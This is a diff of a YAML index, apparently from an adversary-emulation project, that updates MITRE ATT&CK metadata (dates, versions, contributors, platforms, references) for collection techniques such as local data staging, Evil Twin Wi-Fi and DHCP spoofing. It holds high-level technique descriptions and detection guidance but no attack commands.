-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -39923,75 +40388,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -40018,7 +40501,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40042,13 +40525,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -40069,6 +40550,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -40092,8 +40574,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -40118,7 +40602,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -40185,12 +40668,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40224,10 +40706,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -40238,13 +40722,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -40285,9 +40770,6 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests:
     - name: AWS - Scan for Anonymous Access to S3
@@ -40324,30 +40806,7 @@ collection:
         elevation_required: false
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40358,23 +40817,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40444,7 +40927,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -40479,7 +40961,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40498,10 +40980,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -40530,7 +41091,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -40560,8 +41121,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40615,7 +41174,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40652,7 +41210,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40680,12 +41238,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40722,23 +41278,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40771,21 +41327,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -40893,12 +41448,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40909,13 +41463,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -40929,6 +41483,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -40939,12 +41494,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40989,30 +41544,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -41022,31 +41558,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -41079,10 +41632,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
